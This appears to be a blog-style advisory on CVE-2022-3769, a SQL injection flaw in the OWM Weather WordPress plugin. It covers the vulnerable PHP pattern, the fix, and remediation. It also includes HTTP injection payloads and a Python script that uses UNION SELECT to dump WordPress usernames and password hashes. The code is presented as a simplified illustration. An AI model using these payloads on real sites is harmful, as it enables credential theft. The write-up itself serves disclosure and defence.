CVE-2022-3769 is a serious security vulnerability discovered in the popular OWM Weather WordPress plugin, affecting versions before 5.6.9. This flaw allows users as low as “contributor” to exploit a SQL injection due to unsanitized and unescaped parameters in a plugin function. In this post, we’ll break down what happened, show live exploitation, and provide guidance on remediation.
What is OWM Weather Plugin?
OWM Weather integrates OpenWeatherMap’s meteorological data into your WordPress site. With 10,000+ active installs, the plugin offers widgets and shortcodes for quick weather displays.
The Vulnerability
The heart of CVE-2022-3769 is improper handling of user input. The plugin did not sanitize or escape input parameters before using them in a SQL query. If exploited, this allows attackers to modify, steal, or delete data in your database.
Affected Versions:
OWM Weather < 5.6.9
Severity:
Requires “contributor” level or above (users who can submit posts but not publish).
Official Advisory:
- WPScan LINK
- NVD CVE-2022-3769
Where’s the Bug?
The vulnerable code exists in the backend handling of user-submitted data. Here’s a simplified version:
// Example vulnerable code
$location_id = $_POST['location_id'];
$query = "SELECT * FROM {$wpdb->prefix}owm_weather WHERE location_id = $location_id";
$results = $wpdb->get_results($query);
Here, $location_id is taken directly from user input and injected into the SQL statement without validation or escaping.
Suppose the endpoint is /wp-admin/admin-ajax.php
POST /wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded
action=owm_get_weather&location_id=1%20OR%201=1
This transforms the query into an always-true statement
SELECT * FROM wp_owm_weather WHERE location_id = 1 OR 1=1
Now, imagine a more dangerous payload
POST /wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded
action=owm_get_weather&location_id=1;SELECT user_login,user_pass FROM wp_users--
That could expose ALL WordPress usernames and password hashes, if error reporting or output leaks the result back to the attacker.
Here’s a simple Python script to automate the attack
import requests
url = "https://target-site.com/wp-admin/admin-ajax.php";
data = {
"action": "owm_get_weather",
"location_id": "1 UNION SELECT user_login, user_pass, 1, 1, 1 FROM wp_users -- "
}
cookies = {
"wordpress_logged_in_xxx": "yourContributorSessionCookieHere"
}
resp = requests.post(url, data=data, cookies=cookies)
print(resp.text)
Note: You must be logged in as a contributor and update the cookies value.
Remediation
If you use OWM Weather:
Upgrade to at least 5.6.9 immediately. The patch added sanitization and escaping like so
$location_id = intval($_POST['location_id']);
$query = $wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}owm_weather WHERE location_id = %d",
$location_id
);
$results = $wpdb->get_results($query);
Sanitizing with intval and using $wpdb->prepare() prevents SQL injection entirely.
References & Further Reading
- WPScan Database: CVE-2022-3769
- NVD CVE entry
- Plugin Homepage
- WordPress Security Team
Summary: If you're running OWM Weather < 5.6.9, update now. This easy-to-exploit flaw can leak sensitive data — and you only need a contributor account to pull it off. Stay safe by updating and reviewing all plugins for security best practices.
*Exclusively crafted for easy understanding and practical WordPress defense.*
Timeline
Published on: 11/28/2022 14:15:00 UTC
Last modified on: 12/02/2022 19:47:00 UTC